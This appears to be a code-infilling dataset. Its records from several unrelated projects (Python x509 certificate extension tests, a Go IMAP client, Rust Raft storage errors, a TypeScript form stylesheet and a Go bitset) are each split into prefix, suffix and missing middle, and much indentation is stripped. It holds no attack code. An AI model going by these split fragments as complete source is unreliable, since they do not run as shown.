    def test_inhibit_any_policy(self, backend):
        cert = _load_cert(
            os.path.join("x509", "custom", "inhibit_any_policy_5.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        iap = cert.extensions.get_extension_for_oid(
            ExtensionOID.INHIBIT_ANY_POLICY
        ).value
        assert iap.skip_certs == 5
class TestIssuingDistributionPointExtension(object):
@pytest.mark.parametrize(
("filename", "expected"),
[
(
"crl_idp_fullname_indirect_crl.pem",
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=True,
only_contains_attribute_certs=False,
),
),
(
"crl_idp_fullname_only.pem",
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
),
(
"crl_idp_fullname_only_aa.pem",
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=True,
),
),
(
"crl_idp_fullname_only_user.pem",
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=True,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
),
(
"crl_idp_only_ca.pem",
x509.IssuingDistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME,
value="PyCA",
)
]
),
only_contains_user_certs=False,
only_contains_ca_certs=True,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
),
(
"crl_idp_reasons_only.pem",
x509.IssuingDistributionPoint(
full_name=None,
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=frozenset(
[x509.ReasonFlags.key_compromise]
),
indirect_crl=False,
only_contains_attribute_certs=False,
),
),
(
"crl_idp_relative_user_all_reasons.pem",
x509.IssuingDistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME,
value="PyCA",
)
]
),
only_contains_user_certs=True,
only_contains_ca_certs=False,
only_some_reasons=frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
x509.ReasonFlags.affiliation_changed,
x509.ReasonFlags.superseded,
x509.ReasonFlags.cessation_of_operation,
x509.ReasonFlags.certificate_hold,
x509.ReasonFlags.privilege_withdrawn,
x509.ReasonFlags.aa_compromise,
]
),
indirect_crl=False,
only_contains_attribute_certs=False,
),
),
(
"crl_idp_relativename_only.pem",
x509.IssuingDistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME,
value="PyCA",
)
]
),
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
),
],
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_vectors(self, filename, expected, backend):
crl = _load_cert(
os.path.join("x509", "custom", filename),
x509.load_pem_x509_crl,
backend,
)
idp = crl.extensions.get_extension_for_class(
x509.IssuingDistributionPoint
).value
assert idp == expected
@pytest.mark.parametrize(
(
"error",
"only_contains_user_certs",
"only_contains_ca_certs",
"indirect_crl",
"only_contains_attribute_certs",
"only_some_reasons",
"full_name",
"relative_name",
),
[
(
TypeError,
False,
False,
False,
False,
"notafrozenset",
None,
None,
),
(
TypeError,
False,
False,
False,
False,
frozenset(["bad"]),
None,
None,
),
(
ValueError,
False,
False,
False,
False,
frozenset([x509.ReasonFlags.unspecified]),
None,
None,
),
(
ValueError,
False,
False,
False,
False,
frozenset([x509.ReasonFlags.remove_from_crl]),
None,
None,
),
(TypeError, "notabool", False, False, False, None, None, None),
(TypeError, False, "notabool", False, False, None, None, None),
(TypeError, False, False, "notabool", False, None, None, None),
(TypeError, False, False, False, "notabool", None, None, None),
(ValueError, True, True, False, False, None, None, None),
(ValueError, False, False, True, True, None, None, None),
(ValueError, False, False, False, False, None, None, None),
],
)
def test_invalid_init(
self,
error,
only_contains_user_certs,
only_contains_ca_certs,
indirect_crl,
only_contains_attribute_certs,
only_some_reasons,
full_name,
relative_name,
):
with pytest.raises(error):
x509.IssuingDistributionPoint(
full_name,
relative_name,
only_contains_user_certs,
only_contains_ca_certs,
only_some_reasons,
indirect_crl,
only_contains_attribute_certs,
)
def test_repr(self):
idp = x509.IssuingDistributionPoint(
None,
None,
False,
False,
frozenset([x509.ReasonFlags.key_compromise]),
False,
False,
)
assert repr(idp) == (
"<IssuingDistributionPoint(full_name=None, relative_name=None,"
" only_contains_user_certs=False, only_contains_ca_certs=False"
", only_some_reasons=frozenset({<ReasonFlags.key_compromise: '"
"keyCompromise'>}), indirect_crl=False, only_contains_attribut"
"e_certs=False)>"
)
def test_eq(self):
idp1 = x509.IssuingDistributionPoint(
only_contains_user_certs=False,
only_contains_ca_certs=False,
indirect_crl=False,
only_contains_attribute_certs=False,
only_some_reasons=None,
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
)
]
),
)
idp2 = x509.IssuingDistributionPoint(
only_contains_user_certs=False,
only_contains_ca_certs=False,
indirect_crl=False,
only_contains_attribute_certs=False,
only_some_reasons=None,
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
)
]
),
)
assert idp1 == idp2
def test_ne(self):
idp1 = x509.IssuingDistributionPoint(
only_contains_user_certs=False,
only_contains_ca_certs=False,
indirect_crl=False,
only_contains_attribute_certs=False,
only_some_reasons=None,
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
)
]
),
)
idp2 = x509.IssuingDistributionPoint(
only_contains_user_certs=True,
only_contains_ca_certs=False,
indirect_crl=False,
only_contains_attribute_certs=False,
only_some_reasons=None,
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
)
]
),
)
assert idp1 != idp2
assert idp1 != object()
def test_hash(self):
idp1 = x509.IssuingDistributionPoint(
None, None, True, False, None, False, False
)
idp2 = x509.IssuingDistributionPoint(
None, None, True, False, None, False, False
)
idp3 = x509.IssuingDistributionPoint(
None,
x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
)
]
),
True,
False,
None,
False,
False,
)
assert hash(idp1) == hash(idp2)
assert hash(idp1) != hash(idp3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.parametrize(
"idp",
[
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=True,
only_contains_attribute_certs=False,
),
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=True,
),
x509.IssuingDistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
"http://myhost.com/myca.crl"
)
],
relative_name=None,
only_contains_user_certs=True,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
x509.IssuingDistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
)
]
),
only_contains_user_certs=False,
only_contains_ca_certs=True,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
x509.IssuingDistributionPoint(
full_name=None,
relative_name=None,
only_contains_user_certs=False,
only_contains_ca_certs=True,
only_some_reasons=frozenset([x509.ReasonFlags.key_compromise]),
indirect_crl=False,
only_contains_attribute_certs=False,
),
x509.IssuingDistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
),
x509.NameAttribute(
oid=x509.NameOID.COMMON_NAME, value="cryptography"
),
]
),
only_contains_user_certs=True,
only_contains_ca_certs=False,
only_some_reasons=frozenset(
[
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
x509.ReasonFlags.affiliation_changed,
x509.ReasonFlags.privilege_withdrawn,
x509.ReasonFlags.aa_compromise,
]
),
indirect_crl=False,
only_contains_attribute_certs=False,
),
x509.IssuingDistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName(
[
x509.NameAttribute(
oid=x509.NameOID.ORGANIZATION_NAME, value="PyCA"
)
]
),
only_contains_user_certs=False,
only_contains_ca_certs=False,
only_some_reasons=None,
indirect_crl=False,
only_contains_attribute_certs=False,
),
],
)
def test_generate(self, idp, backend):
key = RSA_KEY_2048.private_key(backend)
last_update = datetime.datetime(2002, 1, 1, 12, 1)
next_update = datetime.datetime(2030, 1, 1, 12, 1)
builder = (
x509.CertificateRevocationListBuilder()
.issuer_name(
x509.Name(
[
x509.NameAttribute(
NameOID.COMMON_NAME, "cryptography.io CA"
)
]
)
)
.last_update(last_update)
.next_update(next_update)
.add_extension(idp, True)
)
crl = builder.sign(key, hashes.SHA256(), backend)
ext = crl.extensions.get_extension_for_class(
x509.IssuingDistributionPoint
)
assert ext.critical is True
assert ext.value == idp
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestPrecertPoisonExtension(object):
def test_load(self, backend):
cert = _load_cert(
os.path.join("x509", "cryptography.io.precert.pem"),
x509.load_pem_x509_certificate,
backend,
)
poison = cert.extensions.get_extension_for_oid(
ExtensionOID.PRECERT_POISON
).value
assert isinstance(poison, x509.PrecertPoison)
poison = cert.extensions.get_extension_for_class(
x509.PrecertPoison
).value
assert isinstance(poison, x509.PrecertPoison)
def test_generate(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
cert = (
_make_certbuilder(private_key)
.add_extension(x509.PrecertPoison(), critical=True)
.sign(private_key, hashes.SHA256(), backend)
)
poison = cert.extensions.get_extension_for_oid(
ExtensionOID.PRECERT_POISON
).value
assert isinstance(poison, x509.PrecertPoison)
def test_eq(self):
pcp1 = x509.PrecertPoison()
pcp2 = x509.PrecertPoison()
assert pcp1 == pcp2
def test_hash(self):
pcp1 = x509.PrecertPoison()
pcp2 = x509.PrecertPoison()
assert hash(pcp1) == hash(pcp2)
def test_ne(self):
pcp1 = x509.PrecertPoison()
pcp2 = x509.PrecertPoison()
assert pcp1 == pcp2
assert (pcp1 != pcp2) is False
assert pcp1 != object()
def test_repr(self):
pcp = x509.PrecertPoison()
assert repr(pcp) == "<PrecertPoison()>"
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestSignedCertificateTimestamps(object):
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_eq(self, backend):
sct = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value[0]
)
sct2 = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value[0]
)
assert sct == sct2
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_ne(self, backend):
sct = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value[0]
)
sct2 = (
_load_cert(
os.path.join("x509", "cryptography-scts.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value[0]
)
assert sct != sct2
assert sct != object()
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_hash(self, backend):
sct = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value[0]
)
sct2 = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value[0]
)
sct3 = (
_load_cert(
os.path.join("x509", "cryptography-scts.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value[0]
)
assert hash(sct) == hash(sct2)
assert hash(sct) != hash(sct3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestPrecertificateSignedCertificateTimestampsExtension(object):
def test_init(self):
with pytest.raises(TypeError):
x509.PrecertificateSignedCertificateTimestamps(
[object()] # type:ignore[list-item]
)
def test_repr(self):
assert repr(x509.PrecertificateSignedCertificateTimestamps([])) == (
"<PrecertificateSignedCertificateTimestamps([])>"
)
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_eq(self, backend):
psct1 = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value
)
psct2 = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value
)
assert psct1 == psct2
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_ne(self, backend):
psct1 = (
_load_cert(
os.path.join("x509", "cryptography-scts.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value
)
psct2 = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value
)
assert psct1 != psct2
assert psct1 != object()
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_hash(self, backend):
psct1 = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value
)
psct2 = (
_load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value
)
psct3 = (
_load_cert(
os.path.join("x509", "cryptography-scts.pem"),
x509.load_pem_x509_certificate,
backend,
)
.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
.value
)
assert hash(psct1) == hash(psct2)
assert hash(psct1) != hash(psct3)
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_simple(self, backend):
cert = _load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
scts = cert.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
).value
assert len(scts) == 1
[sct] = scts
assert scts[0] == sct
assert sct.version == x509.certificate_transparency.Version.v1
assert sct.log_id == (
b"\xa7\xceJNb\x07\xe0\xad\xde\xe5\xfd\xaaK\x1f\x86v\x87g\xb5\xd0"
b"\x02\xa5]G1\x0e~g\n\x95\xea\xb2"
)
assert sct.timestamp == datetime.datetime(
2016, 11, 17, 1, 56, 25, 396000
)
assert (
sct.entry_type
== x509.certificate_transparency.LogEntryType.PRE_CERTIFICATE
)
@pytest.mark.supported(
only_if=lambda backend: (backend._lib.Cryptography_HAS_SCT),
skip_message="Requires CT support",
)
def test_generate(self, backend):
cert = _load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
scts = cert.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
).value
assert len(scts) == 1
[sct] = scts
private_key = RSA_KEY_2048.private_key(backend)
builder = _make_certbuilder(private_key).add_extension(
x509.PrecertificateSignedCertificateTimestamps([sct]),
critical=False,
)
cert = builder.sign(private_key, hashes.SHA256(), backend)
ext = cert.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
).value
assert list(ext) == [sct]
@pytest.mark.supported(
only_if=lambda backend: backend._lib.CRYPTOGRAPHY_IS_LIBRESSL,
skip_message="Requires LibreSSL",
)
def test_skips_scts_if_unsupported(self, backend):
cert = _load_cert(
os.path.join("x509", "badssl-sct.pem"),
x509.load_pem_x509_certificate,
backend,
)
assert len(cert.extensions) == 10
with pytest.raises(x509.ExtensionNotFound):
cert.extensions.get_extension_for_class(
x509.PrecertificateSignedCertificateTimestamps
)
ext = cert.extensions.get_extension_for_oid(
x509.ExtensionOID.PRECERT_SIGNED_CERTIFICATE_TIMESTAMPS
)
assert isinstance(ext.value, x509.UnrecognizedExtension)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestInvalidExtension(object):
def test_invalid_certificate_policies_data(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "cp_invalid.pem"),
x509.load_pem_x509_certificate,
backend,
)
with pytest.raises(ValueError):
cert.extensions
class TestOCSPNonce(object):
def test_non_bytes(self):
with pytest.raises(TypeError):
x509.OCSPNonce(38) # type:ignore[arg-type]
def test_eq(self):
nonce1 = x509.OCSPNonce(b"0" * 5)
nonce2 = x509.OCSPNonce(b"0" * 5)
assert nonce1 == nonce2
def test_ne(self):
nonce1 = x509.OCSPNonce(b"0" * 5)
nonce2 = x509.OCSPNonce(b"0" * 6)
assert nonce1 != nonce2
assert nonce1 != object()
def test_repr(self):
nonce1 = x509.OCSPNonce(b"nonce")
assert repr(nonce1) == "<OCSPNonce(nonce=b'nonce')>"
def test_hash(self):
nonce1 = x509.OCSPNonce(b"0" * 5)
nonce2 = x509.OCSPNonce(b"0" * 5)
nonce3 = x509.OCSPNonce(b"1" * 5)
assert hash(nonce1) == hash(nonce2)
assert hash(nonce1) != hash(nonce3)
def test_all_extension_oid_members_have_names_defined():
for oid in dir(ExtensionOID):
if oid.startswith("__"):
continue
assert getattr(ExtensionOID, oid) in _OID_NAMES | )
|
client.go | package i18nlevel
import (
"github.com/emersion/go-imap"
"github.com/emersion/go-imap/client"
)
type Client struct {
c *client.Client
}
func NewClient(c *client.Client) *Client {
return &Client{c: c}
}
// I18NLevel returns the internationalization level supported by the server.
//
// If server does not support the I18NLEVEL extension, 0 is returned.
func (c *Client) I18NLevel() (int, error) {
ok, err := c.c.Support("I18NLEVEL=1")
if err != nil {
return -1, nil
}
if ok |
ok, err = c.c.Support("I18NLEVEL=2")
if err != nil {
return -1, nil
}
if ok {
return 2, nil
}
return 0, nil
}
// ActiveComparator returns the active comparator used.
//
// This command is valid only if I18NLevel() returns 2.
// See RFC 5255 for details.
func (c *Client) ActiveComparator() (string, error) {
if c.c.State()&imap.AuthenticatedState == 0 {
return "", client.ErrNotLoggedIn
}
res := &Comparators{}
status, err := c.c.Execute(&ComparatorCmd{}, res)
if err != nil {
return "", err
}
if err := status.Err(); err != nil {
return "", err
}
return res.Active, nil
}
// ActiveComparator changes the active comparator to the first comparator
// listed in cmps and supported by the server.
//
// This command is valid only if I18NLevel() returns 2.
// See RFC 5255 for details.
func (c *Client) UseComparator(cmps []string) (string, []string, error) {
if c.c.State()&imap.AuthenticatedState == 0 {
return "", nil, client.ErrNotLoggedIn
}
res := &Comparators{}
status, err := c.c.Execute(&ComparatorCmd{
Comparators: cmps,
}, res)
if err != nil {
return "", nil, err
}
if err := status.Err(); err != nil {
return "", nil, err
}
return res.Active, res.Matched, nil
}
| {
return 1, nil
} |
storage_error.rs | use std::fmt::Formatter;
use std::ops::Bound;
use anyerror::AnyError;
use crate::LogId;
use crate::NodeId;
use crate::SnapshotMeta;
use crate::Vote;
/// Convert error to StorageError::IO();
pub trait ToStorageResult<NID: NodeId, T> {
/// Convert Result<T, E> to Result<T, StorageError::IO(StorageIOError)>
///
/// `f` provides error context for building the StorageIOError.
fn sto_res<F>(self, f: F) -> Result<T, StorageError<NID>>
where F: FnOnce() -> (ErrorSubject<NID>, ErrorVerb);
}
impl<NID: NodeId, T> ToStorageResult<NID, T> for Result<T, std::io::Error> {
fn sto_res<F>(self, f: F) -> Result<T, StorageError<NID>>
where F: FnOnce() -> (ErrorSubject<NID>, ErrorVerb) {
match self {
Ok(x) => Ok(x),
Err(e) => {
let (subject, verb) = f();
let io_err = StorageIOError::new(subject, verb, AnyError::new(&e));
Err(io_err.into())
}
}
}
}
/// An error that occurs when the RaftStore impl runs defensive check of input or output.
/// E.g. re-applying an log entry is a violation that may be a potential bug.
#[derive(Debug, Clone, thiserror::Error, PartialEq, Eq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize), serde(bound = ""))]
pub struct DefensiveError<NID: NodeId> {
/// The subject that violates store defensive check, e.g. hard-state, log or state machine.
pub subject: ErrorSubject<NID>,
/// The description of the violation.
pub violation: Violation<NID>,
pub backtrace: Option<String>,
}
impl<NID: NodeId> DefensiveError<NID> {
pub fn | (subject: ErrorSubject<NID>, violation: Violation<NID>) -> Self {
Self {
subject,
violation,
backtrace: anyerror::backtrace_str(),
}
}
}
impl<NID: NodeId> std::fmt::Display for DefensiveError<NID> {
fn fmt(&self, f: &mut Formatter<'_>) -> std::fmt::Result {
write!(f, "'{:?}' violates: '{}'", self.subject, self.violation)
}
}
#[derive(Debug, Clone, PartialEq, Eq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize), serde(bound = ""))]
pub enum ErrorSubject<NID: NodeId> {
/// A general storage error
Store,
/// HardState related error.
Vote,
/// Error that is happened when operating a series of log entries
Logs,
/// Error about a single log entry
Log(LogId<NID>),
/// Error about a single log entry without knowing the log term.
LogIndex(u64),
/// Error happened when applying a log entry
Apply(LogId<NID>),
/// Error happened when operating state machine.
StateMachine,
/// Error happened when operating snapshot.
Snapshot(SnapshotMeta<NID>),
None,
}
/// What it is doing when an error occurs.
#[derive(Debug, Clone, PartialEq, Eq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
pub enum ErrorVerb {
Read,
Write,
Seek,
Delete,
}
/// Violations a store would return when running defensive check.
#[derive(Debug, Clone, thiserror::Error, PartialEq, Eq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize), serde(bound = ""))]
pub enum Violation<NID: NodeId> {
#[error("term can only be change to a greater value, current: {curr}, change to {to}")]
TermNotAscending { curr: u64, to: u64 },
#[error("voted_for can not change from Some() to other Some(), current: {curr:?}, change to {to:?}")]
NonIncrementalVote { curr: Vote<NID>, to: Vote<NID> },
#[error("log at higher index is obsolete: {higher_index_log_id:?} should GT {lower_index_log_id:?}")]
DirtyLog {
higher_index_log_id: LogId<NID>,
lower_index_log_id: LogId<NID>,
},
#[error("try to get log at index {want} but got {got:?}")]
LogIndexNotFound { want: u64, got: Option<u64> },
#[error("range is empty: start: {start:?}, end: {end:?}")]
RangeEmpty { start: Option<u64>, end: Option<u64> },
#[error("range is not half-open: start: {start:?}, end: {end:?}")]
RangeNotHalfOpen { start: Bound<u64>, end: Bound<u64> },
// TODO(xp): rename this to some input related error name.
#[error("empty log vector")]
LogsEmpty,
#[error("all logs are removed. It requires at least one log to track continuity")]
StoreLogsEmpty,
#[error("logs are not consecutive, prev: {prev:?}, next: {next}")]
LogsNonConsecutive { prev: Option<LogId<NID>>, next: LogId<NID> },
#[error("invalid next log to apply: prev: {prev:?}, next: {next}")]
ApplyNonConsecutive { prev: Option<LogId<NID>>, next: LogId<NID> },
#[error("applied log can not conflict, last_applied: {last_applied:?}, delete since: {first_conflict_log_id}")]
AppliedWontConflict {
last_applied: Option<LogId<NID>>,
first_conflict_log_id: LogId<NID>,
},
#[error("not allowed to purge non-applied logs, last_applied: {last_applied:?}, purge upto: {purge_upto}")]
PurgeNonApplied {
last_applied: Option<LogId<NID>>,
purge_upto: LogId<NID>,
},
}
/// A storage error could be either a defensive check error or an error occurred when doing the actual io operation.
#[derive(Debug, Clone, thiserror::Error, PartialEq, Eq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize), serde(bound = ""))]
pub enum StorageError<NID: NodeId> {
/// An error raised by defensive check.
#[error(transparent)]
Defensive {
#[from]
#[cfg_attr(feature = "bt", backtrace)]
source: DefensiveError<NID>,
},
/// An error raised by io operation.
#[error(transparent)]
IO {
#[from]
#[cfg_attr(feature = "bt", backtrace)]
source: StorageIOError<NID>,
},
}
impl<NID: NodeId> StorageError<NID> {
pub fn into_defensive(self) -> Option<DefensiveError<NID>> {
match self {
StorageError::Defensive { source } => Some(source),
_ => None,
}
}
pub fn into_io(self) -> Option<StorageIOError<NID>> {
match self {
StorageError::IO { source } => Some(source),
_ => None,
}
}
pub fn from_io_error(subject: ErrorSubject<NID>, verb: ErrorVerb, io_error: std::io::Error) -> Self {
let sto_io_err = StorageIOError::new(subject, verb, AnyError::new(&io_error));
StorageError::IO { source: sto_io_err }
}
}
/// Error that occurs when operating the store.
#[derive(Debug, Clone, thiserror::Error, PartialEq, Eq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize), serde(bound = ""))]
pub struct StorageIOError<NID: NodeId> {
subject: ErrorSubject<NID>,
verb: ErrorVerb,
source: AnyError,
backtrace: Option<String>,
}
impl<NID: NodeId> std::fmt::Display for StorageIOError<NID> {
fn fmt(&self, f: &mut Formatter<'_>) -> std::fmt::Result {
write!(f, "when {:?} {:?}: {}", self.verb, self.subject, self.source)
}
}
impl<NID: NodeId> StorageIOError<NID> {
pub fn new(subject: ErrorSubject<NID>, verb: ErrorVerb, source: AnyError) -> Self {
Self {
subject,
verb,
source,
backtrace: anyerror::backtrace_str(),
}
}
}
| new |
styles.ts | import styled from "styled-components";
import { darken, transparentize } from "polished";
export const Container = styled.form`
h2 {
color: var(--text-title);
font-size: 1.5rem;
margin-bottom: 2rem;
}
input {
width: 100%;
padding: 0 1.5rem;
height: 4rem;
border-radius: 0.25rem;
background: #e7e9ee;
border: 1px solid #d7d7d7;
font-weight: 400;
font-size: 1rem;
&::placeholder {
color: var(--text-body);
}
& + input {
margin-top: 1rem;
}
}
button[type="submit"] {
width: 100%;
padding: 0 1.5rem;
height: 4rem;
background: var(--green); | color: white;
border-radius: 0.25rem;
border: 0;
font-size: 1rem;
margin-top: 1.5rem;
font-weight: 600;
transition: filter 0.2s;
&:hover {
filter: brightness(0.9);
}
}
`;
export const ButtonsWrapper = styled.div`
margin: 1rem 0;
display: grid;
grid-template-columns: 1fr 1fr;
gap: 0.5rem;
button {
}
`;
interface RadioBoxProps {
isActive: boolean;
activeColor: "green" | "red";
}
const colors = {
red: "#E52E4D",
green: "#33CC95",
};
export const RadioBox = styled.button<RadioBoxProps>`
height: 4rem;
border: 1px solid #d7d7d7;
border-radius: 0.25rem;
background: ${(props) =>
props.isActive
? transparentize(0.9, colors[props.activeColor])
: "transparent"};
display: flex;
align-items: center;
justify-content: center;
transition: border-color 0.2s;
img {
width: 20px;
height: 20px;
}
span {
display: inline-block;
margin-left: 1rem;
font-size: 1rem;
color: var(--text-title);
}
&:hover {
border-color: ${darken(0.1, "#D7D7D7")};
}
`; | |
bitset.go | package porcupine
import "math/bits"
type bitset []uint64
// data layout:
// bits 0-63 are in data[0], the next are in data[1], etc.
func newBitset(bits uint) bitset {
extra := uint(0)
if bits%64 != 0 |
chunks := bits/64 + extra
return bitset(make([]uint64, chunks))
}
func (b bitset) clone() bitset {
dataCopy := make([]uint64, len(b))
copy(dataCopy, b)
return bitset(dataCopy)
}
func bitsetIndex(pos uint) (uint, uint) {
return pos / 64, pos % 64
}
func (b bitset) set(pos uint) bitset {
major, minor := bitsetIndex(pos)
b[major] |= (1 << minor)
return b
}
func (b bitset) clear(pos uint) bitset {
major, minor := bitsetIndex(pos)
b[major] &^= (1 << minor)
return b
}
func (b bitset) get(pos uint) bool {
major, minor := bitsetIndex(pos)
return b[major]&(1<<minor) != 0
}
func (b bitset) popcnt() uint {
total := 0
for _, v := range b {
total += bits.OnesCount64(v)
}
